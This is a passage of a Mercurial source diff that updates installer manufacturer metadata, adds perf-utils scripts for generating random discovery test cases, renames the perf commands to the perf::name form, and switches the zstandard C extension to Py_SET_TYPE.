+VersionInfoCopyright=Copyright 2005-2021 Olivia Mackall and others
+VersionInfoCompany=Olivia Mackall and others
VersionInfoVersion={#QUAD_VERSION}
InternalCompressLevel=max
SolidCompression=true
--- a/contrib/packaging/wix/mercurial.wxs Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/packaging/wix/mercurial.wxs Tue Apr 20 11:01:06 2021 -0400
@@ -19,14 +19,14 @@
Name='Mercurial $(var.Version) ($(var.Platform))'
UpgradeCode='$(var.ProductUpgradeCode)'
Language='1033' Codepage='1252' Version='$(var.Version)'
- Manufacturer='Matt Mackall and others'>
+ Manufacturer='Olivia Mackall and others'>
<Package Id='*'
Keywords='Installer'
Description="Mercurial distributed SCM (version $(var.Version))"
Comments='$(var.Comments)'
Platform='$(var.Platform)'
- Manufacturer='Matt Mackall and others'
+ Manufacturer='Olivia Mackall and others'
InstallerVersion='300' Languages='1033' Compressed='yes' SummaryCodepage='1252' />
<Media Id='1' Cabinet='mercurial.cab' EmbedCab='yes' DiskPrompt='CD-ROM #1'
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/contrib/perf-utils/search-discovery-case Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,198 @@
+#!/usr/bin/env python3
+# Search for interesting discovery instance
+#
+# search-discovery-case REPO [REPO]…
+#
+# This uses the subsetmaker extension (next to this script) to generate a
+# stream of random discovery instances. When interesting cases are discovered,
+# information about them is printed on stdout.
+from __future__ import print_function
+
+import json
+import os
+import queue
+import random
+import signal
+import subprocess
+import sys
+import threading
+
+this_script = os.path.abspath(sys.argv[0])
+this_dir = os.path.dirname(this_script)
+hg_dir = os.path.join(this_dir, '..', '..')
+HG_REPO = os.path.normpath(hg_dir)
+HG_BIN = os.path.join(HG_REPO, 'hg')
+
+JOB = int(os.environ.get('NUMBER_OF_PROCESSORS', 8))
+
+
+SLICING = ('scratch', 'randomantichain', 'rev')
+
+
+def nb_revs(repo_path):
+ cmd = [
+ HG_BIN,
+ '--repository',
+ repo_path,
+ 'log',
+ '--template',
+ '{rev}',
+ '--rev',
+ 'tip',
+ ]
+ s = subprocess.Popen(cmd, stdout=subprocess.PIPE)
+ out, err = s.communicate()
+ return int(out)
+
+
+repos = []
+for repo in sys.argv[1:]:
+ size = nb_revs(repo)
+ repos.append((repo, size))
+
+
+def pick_one(repo):
+ pick = random.choice(SLICING)
+ seed = random.randint(0, 100000)
+ if pick == 'scratch':
+ start = int(repo[1] * 0.3)
+ end = int(repo[1] * 0.7)
+ nb = random.randint(start, end)
+ return ('scratch', nb, seed)
+ elif pick == 'randomantichain':
+ return ('randomantichain', seed)
+ elif pick == 'rev':
+ start = int(repo[1] * 0.3)
+ end = int(repo[1])
+ rev = random.randint(start, end)
+ return ('rev', rev)
+ else:
+ assert False
+
+
+done = threading.Event()
+cases = queue.Queue(maxsize=10 * JOB)
+results = queue.Queue()
+
+
+def worker():
+ while not done.is_set():
+ c = cases.get()
+ if c is None:
+ return
+ try:
+ res = process(c)
+ results.put((c, res))
+ except Exception as exc:
+ print('processing-failed: %s %s' % (c, exc), file=sys.stderr)
+ c = (c[0], c[2], c[1])
+ try:
+ res = process(c)
+ results.put((c, res))
+ except Exception as exc:
+ print('processing-failed: %s %s' % (c, exc), file=sys.stderr)
+
+
+SUBSET_PATH = os.path.join(HG_REPO, 'contrib', 'perf-utils', 'subsetmaker.py')
+
+
+CMD_BASE = (
+ HG_BIN,
+ 'debugdiscovery',
+ '--template',
+ 'json',
+ '--config',
+ 'extensions.subset=%s' % SUBSET_PATH,
+)
+# '--local-as-revs "$left" --local-as-revs "$right"'
+# > /data/discovery-references/results/disco-mozilla-unified-$1-$2.txt
+# )
+
+
+def to_revsets(case):
+ t = case[0]
+ if t == 'scratch':
+ return 'not scratch(all(), %d, "%d")' % (case[1], case[2])
+ elif t == 'randomantichain':
+ return '::randomantichain(all(), "%d")' % case[1]
+ elif t == 'rev':
+ return '::%d' % case[1]
+ else:
+ assert False
+
+
+def process(case):
+ (repo, left, right) = case
+ cmd = list(CMD_BASE)
+ cmd.append('-R')
+ cmd.append(repo[0])
+ cmd.append('--local-as-revs')
+ cmd.append(to_revsets(left))
+ cmd.append('--remote-as-revs')
+ cmd.append(to_revsets(right))
+ s = subprocess.Popen(cmd, stdout=subprocess.PIPE)
+ out, err = s.communicate()
+ return json.loads(out)[0]
+
+
+def interesting_boundary(res):
+ """check if a case is interesting or not
+
+    For now we are mostly interested in cases where we do multiple round-trips
+    and where the boundary is somewhere in the middle of the undecided set.
+
+ Ideally, we would make this configurable, but this is not a focus for now
+
+ return None or (round-trip, undecided-common, undecided-missing)
+ """
+ roundtrips = res["total-roundtrips"]
+ if roundtrips <= 1:
+ return None
+ undecided_common = res["nb-ini_und-common"]
+ undecided_missing = res["nb-ini_und-missing"]
+ if undecided_common == 0:
+ return None
+ if undecided_missing == 0:
+ return None
+ return (roundtrips, undecided_common, undecided_missing)
+
+
+def end(*args, **kwargs):
+ done.set()
+
+
+def format_case(case):
+ return '-'.join(str(s) for s in case)
+
+
+signal.signal(signal.SIGINT, end)
+
+for i in range(JOB):
+ threading.Thread(target=worker).start()
+
+nb_cases = 0
+while not done.is_set():
+ repo = random.choice(repos)
+ left = pick_one(repo)
+ right = pick_one(repo)
+ cases.put((repo, left, right))
+ while not results.empty():
+ # results has a single reader so this is fine
+ c, res = results.get_nowait()
+ boundary = interesting_boundary(res)
+ if boundary is not None:
+ print(c[0][0], format_case(c[1]), format_case(c[2]), *boundary)
+ sys.stdout.flush()
+
+ nb_cases += 1
+ if not nb_cases % 100:
+ print('[%d cases generated]' % nb_cases, file=sys.stderr)
+
+for i in range(JOB):
+ try:
+ cases.put_nowait(None)
+ except queue.Full:
+ pass
+
+print('[%d cases generated]' % nb_cases, file=sys.stderr)
+print('[output generation is over]', file=sys.stderr)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/contrib/perf-utils/subsetmaker.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,170 @@
+"""revset to select sample of repository
+
+Hopefully this is useful to create interesting discovery cases.
+"""
+
+import collections
+import random
+
+from mercurial.i18n import _
+
+from mercurial import (
+ registrar,
+ revset,
+ revsetlang,
+ smartset,
+)
+
+revsetpredicate = registrar.revsetpredicate()
+
+
+@revsetpredicate(b'subsetspec("<spec>")')
+def subsetmarkerspec(repo, subset, x):
+ """use a shorthand spec as used by search-discovery-case
+
+ Supported format are:
+
+ - "scratch-count-seed": not scratch(all(), count, "seed")
+ - "randomantichain-seed": ::randomantichain(all(), "seed")
+ - "rev-REV": "::REV"
+ """
+ args = revsetlang.getargs(
+        x, 0, 1, _(b'subsetspec("spec") requires an argument')
+ )
+
+ spec = revsetlang.getstring(args[0], _(b"spec should be a string"))
+ case = spec.split(b'-')
+ t = case[0]
+ if t == b'scratch':
+ spec_revset = b'not scratch(all(), %s, "%s")' % (case[1], case[2])
+ elif t == b'randomantichain':
+ spec_revset = b'::randomantichain(all(), "%s")' % case[1]
+ elif t == b'rev':
+        spec_revset = b'::%s' % case[1]
+ else:
+ assert False, spec
+
+ selected = repo.revs(spec_revset)
+
+ return selected & subset
+
+
+@revsetpredicate(b'scratch(REVS, <count>, [seed])')
+def scratch(repo, subset, x):
+ """randomly remove <count> revision from the repository top
+
+    This subset is created by recursively picking changesets starting from the
+ heads. It can be summarized using the following algorithm::
+
+ selected = set()
+ for i in range(<count>):
+ unselected = repo.revs("not <selected>")
+ candidates = repo.revs("heads(<unselected>)")
+ pick = random.choice(candidates)
+ selected.add(pick)
+ """
+ m = _(b"scratch expects revisions, count argument and an optional seed")
+ args = revsetlang.getargs(x, 2, 3, m)
+ if len(args) == 2:
+ x, n = args
+ rand = random
+ elif len(args) == 3:
+ x, n, seed = args
+ seed = revsetlang.getinteger(seed, _(b"seed should be a number"))
+ rand = random.Random(seed)
+ else:
+ assert False
+
+ n = revsetlang.getinteger(n, _(b"scratch expects a number"))
+
+ selected = set()
+ heads = set()
+ children_count = collections.defaultdict(lambda: 0)
+ parents = repo.changelog._uncheckedparentrevs
+
+ baseset = revset.getset(repo, smartset.fullreposet(repo), x)
+ baseset.sort()
+ for r in baseset:
+ heads.add(r)
+
+ p1, p2 = parents(r)
+ if p1 >= 0:
+ heads.discard(p1)
+ children_count[p1] += 1
+ if p2 >= 0:
+ heads.discard(p2)
+ children_count[p2] += 1
+
+ for h in heads:
+ assert children_count[h] == 0
+
+ selected = set()
+ for x in range(n):
+ if not heads:
+ break
+ pick = rand.choice(list(heads))
+ heads.remove(pick)
+ assert pick not in selected
+ selected.add(pick)
+ p1, p2 = parents(pick)
+ if p1 in children_count:
+ assert p1 in children_count
+ children_count[p1] -= 1
+ assert children_count[p1] >= 0
+ if children_count[p1] == 0:
+ assert p1 not in selected, (r, p1)
+ heads.add(p1)
+ if p2 in children_count:
+ assert p2 in children_count
+ children_count[p2] -= 1
+ assert children_count[p2] >= 0
+ if children_count[p2] == 0:
+ assert p2 not in selected, (r, p2)
+ heads.add(p2)
+
+ return smartset.baseset(selected) & subset
+
+
+@revsetpredicate(b'randomantichain(REVS, [seed])')
+def antichain(repo, subset, x):
+ """Pick a random anti-chain in the repository
+
+    An antichain is a set of changesets in which no element is either a
+    descendant or an ancestor of any other element of the set. In other
+    words, all the elements are independent. It can be summarized with the
+ following algorithm::
+
+ selected = set()
+ unselected = repo.revs('all()')
+ while unselected:
+ pick = random.choice(unselected)
+ selected.add(pick)
+ unselected -= repo.revs('::<pick> + <pick>::')
+ """
+
+ args = revsetlang.getargs(
+ x, 1, 2, _(b"randomantichain expects revisions and an optional seed")
+ )
+ if len(args) == 1:
+ (x,) = args
+ rand = random
+ elif len(args) == 2:
+ x, seed = args
+ seed = revsetlang.getinteger(seed, _(b"seed should be a number"))
+ rand = random.Random(seed)
+ else:
+ assert False
+
+ selected = set()
+
+ baseset = revset.getset(repo, smartset.fullreposet(repo), x)
+ undecided = baseset
+
+ while undecided:
+ pick = rand.choice(list(undecided))
+ selected.add(pick)
+ undecided = repo.revs(
+ '%ld and not (::%ld or %ld::head())', baseset, selected, selected
+ )
+
+ return smartset.baseset(selected) & subset
--- a/contrib/perf.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/perf.py Tue Apr 20 11:01:06 2021 -0400
@@ -744,7 +744,7 @@
# perf commands
-@command(b'perfwalk', formatteropts)
+@command(b'perf::walk|perfwalk', formatteropts)
def perfwalk(ui, repo, *pats, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -759,7 +759,7 @@
fm.end()
-@command(b'perfannotate', formatteropts)
+@command(b'perf::annotate|perfannotate', formatteropts)
def perfannotate(ui, repo, f, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -769,7 +769,7 @@
@command(
- b'perfstatus',
+ b'perf::status|perfstatus',
[
(b'u', b'unknown', False, b'ask status to look for unknown files'),
(b'', b'dirstate', False, b'benchmark the internal dirstate call'),
@@ -806,7 +806,7 @@
fm.end()
-@command(b'perfaddremove', formatteropts)
+@command(b'perf::addremove|perfaddremove', formatteropts)
def perfaddremove(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -837,7 +837,7 @@
cl._nodepos = None
-@command(b'perfheads', formatteropts)
+@command(b'perf::heads|perfheads', formatteropts)
def perfheads(ui, repo, **opts):
"""benchmark the computation of a changelog heads"""
opts = _byteskwargs(opts)
@@ -855,7 +855,7 @@
@command(
- b'perftags',
+ b'perf::tags|perftags',
formatteropts
+ [
(b'', b'clear-revlogs', False, b'refresh changelog and manifest'),
@@ -880,7 +880,7 @@
fm.end()
-@command(b'perfancestors', formatteropts)
+@command(b'perf::ancestors|perfancestors', formatteropts)
def perfancestors(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -894,7 +894,7 @@
fm.end()
-@command(b'perfancestorset', formatteropts)
+@command(b'perf::ancestorset|perfancestorset', formatteropts)
def perfancestorset(ui, repo, revset, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -910,12 +910,18 @@
fm.end()
-@command(b'perfdiscovery', formatteropts, b'PATH')
+@command(b'perf::discovery|perfdiscovery', formatteropts, b'PATH')
def perfdiscovery(ui, repo, path, **opts):
"""benchmark discovery between local repo and the peer at given path"""
repos = [repo, None]
timer, fm = gettimer(ui, opts)
- path = ui.expandpath(path)
+
+ try:
+ from mercurial.utils.urlutil import get_unique_pull_path
+
+ path = get_unique_pull_path(b'perfdiscovery', repo, ui, path)[0]
+ except ImportError:
+ path = ui.expandpath(path)
def s():
repos[1] = hg.peer(ui, opts, path)
@@ -928,7 +934,7 @@
@command(
- b'perfbookmarks',
+ b'perf::bookmarks|perfbookmarks',
formatteropts
+ [
(b'', b'clear-revlogs', False, b'refresh changelog and manifest'),
@@ -953,7 +959,7 @@
fm.end()
-@command(b'perfbundleread', formatteropts, b'BUNDLE')
+@command(b'perf::bundleread|perfbundleread', formatteropts, b'BUNDLE')
def perfbundleread(ui, repo, bundlepath, **opts):
"""Benchmark reading of bundle files.
@@ -1080,7 +1086,7 @@
@command(
- b'perfchangegroupchangelog',
+ b'perf::changegroupchangelog|perfchangegroupchangelog',
formatteropts
+ [
(b'', b'cgversion', b'02', b'changegroup version'),
@@ -1116,7 +1122,7 @@
fm.end()
-@command(b'perfdirs', formatteropts)
+@command(b'perf::dirs|perfdirs', formatteropts)
def perfdirs(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1132,7 +1138,7 @@
@command(
- b'perfdirstate',
+ b'perf::dirstate|perfdirstate',
[
(
b'',
@@ -1195,7 +1201,7 @@
fm.end()
-@command(b'perfdirstatedirs', formatteropts)
+@command(b'perf::dirstatedirs|perfdirstatedirs', formatteropts)
def perfdirstatedirs(ui, repo, **opts):
"""benchmap a 'dirstate.hasdir' call from an empty `dirs` cache"""
opts = _byteskwargs(opts)
@@ -1212,7 +1218,7 @@
fm.end()
-@command(b'perfdirstatefoldmap', formatteropts)
+@command(b'perf::dirstatefoldmap|perfdirstatefoldmap', formatteropts)
def perfdirstatefoldmap(ui, repo, **opts):
"""benchmap a `dirstate._map.filefoldmap.get()` request
@@ -1233,7 +1239,7 @@
fm.end()
-@command(b'perfdirfoldmap', formatteropts)
+@command(b'perf::dirfoldmap|perfdirfoldmap', formatteropts)
def perfdirfoldmap(ui, repo, **opts):
"""benchmap a `dirstate._map.dirfoldmap.get()` request
@@ -1255,7 +1261,7 @@
fm.end()
-@command(b'perfdirstatewrite', formatteropts)
+@command(b'perf::dirstatewrite|perfdirstatewrite', formatteropts)
def perfdirstatewrite(ui, repo, **opts):
"""benchmap the time it take to write a dirstate on disk"""
opts = _byteskwargs(opts)
@@ -1297,7 +1303,7 @@
@command(
- b'perfmergecalculate',
+ b'perf::mergecalculate|perfmergecalculate',
[
(b'r', b'rev', b'.', b'rev to merge against'),
(b'', b'from', b'', b'rev to merge from'),
@@ -1330,7 +1336,7 @@
@command(
- b'perfmergecopies',
+ b'perf::mergecopies|perfmergecopies',
[
(b'r', b'rev', b'.', b'rev to merge against'),
(b'', b'from', b'', b'rev to merge from'),
@@ -1353,7 +1359,7 @@
fm.end()
-@command(b'perfpathcopies', [], b"REV REV")
+@command(b'perf::pathcopies|perfpathcopies', [], b"REV REV")
def perfpathcopies(ui, repo, rev1, rev2, **opts):
"""benchmark the copy tracing logic"""
opts = _byteskwargs(opts)
@@ -1369,7 +1375,7 @@
@command(
- b'perfphases',
+ b'perf::phases|perfphases',
[
(b'', b'full', False, b'include file reading time too'),
],
@@ -1394,7 +1400,7 @@
fm.end()
-@command(b'perfphasesremote', [], b"[DEST]")
+@command(b'perf::phasesremote|perfphasesremote', [], b"[DEST]")
def perfphasesremote(ui, repo, dest=None, **opts):
"""benchmark time needed to analyse phases of the remote server"""
from mercurial.node import bin
@@ -1407,7 +1413,7 @@
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
+ path = ui.getpath(dest, default=(b'default-push', b'default'))
if not path:
raise error.Abort(
b'default repository not configured!',
@@ -1455,7 +1461,7 @@
@command(
- b'perfmanifest',
+ b'perf::manifest|perfmanifest',
[
(b'm', b'manifest-rev', False, b'Look up a manifest node revision'),
(b'', b'clear-disk', False, b'clear on-disk caches too'),
@@ -1499,7 +1505,7 @@
fm.end()
-@command(b'perfchangeset', formatteropts)
+@command(b'perf::changeset|perfchangeset', formatteropts)
def perfchangeset(ui, repo, rev, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1513,7 +1519,7 @@
fm.end()
-@command(b'perfignore', formatteropts)
+@command(b'perf::ignore|perfignore', formatteropts)
def perfignore(ui, repo, **opts):
"""benchmark operation related to computing ignore"""
opts = _byteskwargs(opts)
@@ -1532,7 +1538,7 @@
@command(
- b'perfindex',
+ b'perf::index|perfindex',
[
(b'', b'rev', [], b'revision to be looked up (default tip)'),
(b'', b'no-lookup', None, b'do not revision lookup post creation'),
@@ -1596,7 +1602,7 @@
@command(
- b'perfnodemap',
+ b'perf::nodemap|perfnodemap',
[
(b'', b'rev', [], b'revision to be looked up (default tip)'),
(b'', b'clear-caches', True, b'clear revlog cache between calls'),
@@ -1667,7 +1673,7 @@
fm.end()
-@command(b'perfstartup', formatteropts)
+@command(b'perf::startup|perfstartup', formatteropts)
def perfstartup(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1685,7 +1691,7 @@
fm.end()
-@command(b'perfparents', formatteropts)
+@command(b'perf::parents|perfparents', formatteropts)
def perfparents(ui, repo, **opts):
"""benchmark the time necessary to fetch one changeset's parents.
@@ -1712,7 +1718,7 @@
fm.end()
-@command(b'perfctxfiles', formatteropts)
+@command(b'perf::ctxfiles|perfctxfiles', formatteropts)
def perfctxfiles(ui, repo, x, **opts):
opts = _byteskwargs(opts)
x = int(x)
@@ -1725,7 +1731,7 @@
fm.end()
-@command(b'perfrawfiles', formatteropts)
+@command(b'perf::rawfiles|perfrawfiles', formatteropts)
def perfrawfiles(ui, repo, x, **opts):
opts = _byteskwargs(opts)
x = int(x)
@@ -1739,7 +1745,7 @@
fm.end()
-@command(b'perflookup', formatteropts)
+@command(b'perf::lookup|perflookup', formatteropts)
def perflookup(ui, repo, rev, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1748,7 +1754,7 @@
@command(
- b'perflinelogedits',
+ b'perf::linelogedits|perflinelogedits',
[
(b'n', b'edits', 10000, b'number of edits'),
(b'', b'max-hunk-lines', 10, b'max lines in a hunk'),
@@ -1786,7 +1792,7 @@
fm.end()
-@command(b'perfrevrange', formatteropts)
+@command(b'perf::revrange|perfrevrange', formatteropts)
def perfrevrange(ui, repo, *specs, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1795,7 +1801,7 @@
fm.end()
-@command(b'perfnodelookup', formatteropts)
+@command(b'perf::nodelookup|perfnodelookup', formatteropts)
def perfnodelookup(ui, repo, rev, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1814,7 +1820,7 @@
@command(
- b'perflog',
+ b'perf::log|perflog',
[(b'', b'rename', False, b'ask log to follow renames')] + formatteropts,
)
def perflog(ui, repo, rev=None, **opts):
@@ -1832,7 +1838,7 @@
fm.end()
-@command(b'perfmoonwalk', formatteropts)
+@command(b'perf::moonwalk|perfmoonwalk', formatteropts)
def perfmoonwalk(ui, repo, **opts):
"""benchmark walking the changelog backwards
@@ -1851,7 +1857,7 @@
@command(
- b'perftemplating',
+ b'perf::templating|perftemplating',
[
(b'r', b'rev', [], b'revisions to run the template on'),
]
@@ -1941,7 +1947,7 @@
@command(
- b'perfhelper-mergecopies',
+ b'perf::helper-mergecopies|perfhelper-mergecopies',
formatteropts
+ [
(b'r', b'revs', [], b'restrict search to these revisions'),
@@ -2124,7 +2130,7 @@
@command(
- b'perfhelper-pathcopies',
+ b'perf::helper-pathcopies|perfhelper-pathcopies',
formatteropts
+ [
(b'r', b'revs', [], b'restrict search to these revisions'),
@@ -2263,7 +2269,7 @@
_displaystats(ui, opts, entries, alldata)
-@command(b'perfcca', formatteropts)
+@command(b'perf::cca|perfcca', formatteropts)
def perfcca(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2271,7 +2277,7 @@
fm.end()
-@command(b'perffncacheload', formatteropts)
+@command(b'perf::fncacheload|perffncacheload', formatteropts)
def perffncacheload(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2284,7 +2290,7 @@
fm.end()
-@command(b'perffncachewrite', formatteropts)
+@command(b'perf::fncachewrite|perffncachewrite', formatteropts)
def perffncachewrite(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2304,7 +2310,7 @@
fm.end()
-@command(b'perffncacheencode', formatteropts)
+@command(b'perf::fncacheencode|perffncacheencode', formatteropts)
def perffncacheencode(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2348,7 +2354,7 @@
@command(
- b'perfbdiff',
+ b'perf::bdiff|perfbdiff',
revlogopts
+ formatteropts
+ [
@@ -2464,7 +2470,7 @@
@command(
- b'perfunidiff',
+ b'perf::unidiff|perfunidiff',
revlogopts
+ formatteropts
+ [
@@ -2543,7 +2549,7 @@
fm.end()
-@command(b'perfdiffwd', formatteropts)
+@command(b'perf::diffwd|perfdiffwd', formatteropts)
def perfdiffwd(ui, repo, **opts):
"""Profile diff of working directory changes"""
opts = _byteskwargs(opts)
@@ -2568,7 +2574,11 @@
fm.end()
-@command(b'perfrevlogindex', revlogopts + formatteropts, b'-c|-m|FILE')
+@command(
+ b'perf::revlogindex|perfrevlogindex',
+ revlogopts + formatteropts,
+ b'-c|-m|FILE',
+)
def perfrevlogindex(ui, repo, file_=None, **opts):
"""Benchmark operations against a revlog index.
@@ -2704,7 +2714,7 @@
@command(
- b'perfrevlogrevisions',
+ b'perf::revlogrevisions|perfrevlogrevisions',
revlogopts
+ formatteropts
+ [
@@ -2754,7 +2764,7 @@
@command(
- b'perfrevlogwrite',
+ b'perf::revlogwrite|perfrevlogwrite',
revlogopts
+ formatteropts
+ [
@@ -3047,7 +3057,7 @@
@command(
- b'perfrevlogchunks',
+ b'perf::revlogchunks|perfrevlogchunks',
revlogopts
+ formatteropts
+ [
@@ -3176,7 +3186,7 @@
@command(
- b'perfrevlogrevision',
+ b'perf::revlogrevision|perfrevlogrevision',
revlogopts
+ formatteropts
+ [(b'', b'cache', False, b'use caches instead of clearing')],
@@ -3218,7 +3228,10 @@
start = r.start
length = r.length
inline = r._inline
- iosize = r._io.size
+ try:
+ iosize = r.index.entry_size
+ except AttributeError:
+ iosize = r._io.size
buffer = util.buffer
chunks = []
@@ -3319,7 +3332,7 @@
@command(
- b'perfrevset',
+ b'perf::revset|perfrevset',
[
(b'C', b'clear', False, b'clear volatile cache between each call.'),
(b'', b'contexts', False, b'obtain changectx for each revision'),
@@ -3352,7 +3365,7 @@
@command(
- b'perfvolatilesets',
+ b'perf::volatilesets|perfvolatilesets',
[
(b'', b'clear-obsstore', False, b'drop obsstore between each call.'),
]
@@ -3401,7 +3414,7 @@
@command(
- b'perfbranchmap',
+ b'perf::branchmap|perfbranchmap',
[
(b'f', b'full', False, b'Includes build time of subset'),
(
@@ -3492,7 +3505,7 @@
@command(
- b'perfbranchmapupdate',
+ b'perf::branchmapupdate|perfbranchmapupdate',
[
(b'', b'base', [], b'subset of revision to start from'),
(b'', b'target', [], b'subset of revision to end with'),
@@ -3602,7 +3615,7 @@
@command(
- b'perfbranchmapload',
+ b'perf::branchmapload|perfbranchmapload',
[
(b'f', b'filter', b'', b'Specify repoview filter'),
(b'', b'list', False, b'List branchmap filter caches'),
@@ -3661,19 +3674,19 @@
fm.end()
-@command(b'perfloadmarkers')
+@command(b'perf::loadmarkers|perfloadmarkers')
def perfloadmarkers(ui, repo):
"""benchmark the time to parse the on-disk markers for a repo
Result is the number of markers in the repo."""
timer, fm = gettimer(ui)
svfs = getsvfs(repo)
- timer(lambda: len(obsolete.obsstore(svfs)))
+ timer(lambda: len(obsolete.obsstore(repo, svfs)))
fm.end()
@command(
- b'perflrucachedict',
+ b'perf::lrucachedict|perflrucachedict',
formatteropts
+ [
(b'', b'costlimit', 0, b'maximum total cost of items in cache'),
@@ -3829,7 +3842,7 @@
@command(
- b'perfwrite',
+ b'perf::write|perfwrite',
formatteropts
+ [
(b'', b'write-method', b'write', b'ui write method'),
@@ -3892,7 +3905,7 @@
@command(
- b'perfprogress',
+ b'perf::progress|perfprogress',
formatteropts
+ [
(b'', b'topic', b'topic', b'topic for progress messages'),
--- a/contrib/python-zstandard/c-ext/bufferutil.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/bufferutil.c Tue Apr 20 11:01:06 2021 -0400
@@ -758,7 +758,7 @@
};
void bufferutil_module_init(PyObject* mod) {
- Py_TYPE(&ZstdBufferWithSegmentsType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferWithSegmentsType, &PyType_Type);
if (PyType_Ready(&ZstdBufferWithSegmentsType) < 0) {
return;
}
@@ -766,7 +766,7 @@
Py_INCREF(&ZstdBufferWithSegmentsType);
PyModule_AddObject(mod, "BufferWithSegments", (PyObject*)&ZstdBufferWithSegmentsType);
- Py_TYPE(&ZstdBufferSegmentsType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferSegmentsType, &PyType_Type);
if (PyType_Ready(&ZstdBufferSegmentsType) < 0) {
return;
}
@@ -774,7 +774,7 @@
Py_INCREF(&ZstdBufferSegmentsType);
PyModule_AddObject(mod, "BufferSegments", (PyObject*)&ZstdBufferSegmentsType);
- Py_TYPE(&ZstdBufferSegmentType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferSegmentType, &PyType_Type);
if (PyType_Ready(&ZstdBufferSegmentType) < 0) {
return;
}
@@ -782,7 +782,7 @@
Py_INCREF(&ZstdBufferSegmentType);
PyModule_AddObject(mod, "BufferSegment", (PyObject*)&ZstdBufferSegmentType);
- Py_TYPE(&ZstdBufferWithSegmentsCollectionType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferWithSegmentsCollectionType, &PyType_Type);
if (PyType_Ready(&ZstdBufferWithSegmentsCollectionType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionchunker.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionchunker.c Tue Apr 20 11:01:06 2021 -0400
@@ -348,12 +348,12 @@
};
void compressionchunker_module_init(PyObject* module) {
- Py_TYPE(&ZstdCompressionChunkerIteratorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionChunkerIteratorType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionChunkerIteratorType) < 0) {
return;
}
- Py_TYPE(&ZstdCompressionChunkerType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionChunkerType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionChunkerType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressiondict.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressiondict.c Tue Apr 20 11:01:06 2021 -0400
@@ -400,7 +400,7 @@
};
void compressiondict_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressionDictType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionDictType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionDictType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionparams.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionparams.c Tue Apr 20 11:01:06 2021 -0400
@@ -556,7 +556,7 @@
};
void compressionparams_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressionParametersType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionParametersType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionParametersType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionreader.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionreader.c Tue Apr 20 11:01:06 2021 -0400
@@ -811,7 +811,7 @@
void compressionreader_module_init(PyObject* mod) {
/* TODO make reader a sub-class of io.RawIOBase */
- Py_TYPE(&ZstdCompressionReaderType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionReaderType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionReaderType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionwriter.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionwriter.c Tue Apr 20 11:01:06 2021 -0400
@@ -365,7 +365,7 @@
};
void compressionwriter_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressionWriterType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionWriterType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionWriterType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressobj.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressobj.c Tue Apr 20 11:01:06 2021 -0400
@@ -249,7 +249,7 @@
};
void compressobj_module_init(PyObject* module) {
- Py_TYPE(&ZstdCompressionObjType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionObjType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionObjType) < 0) {
return;
}
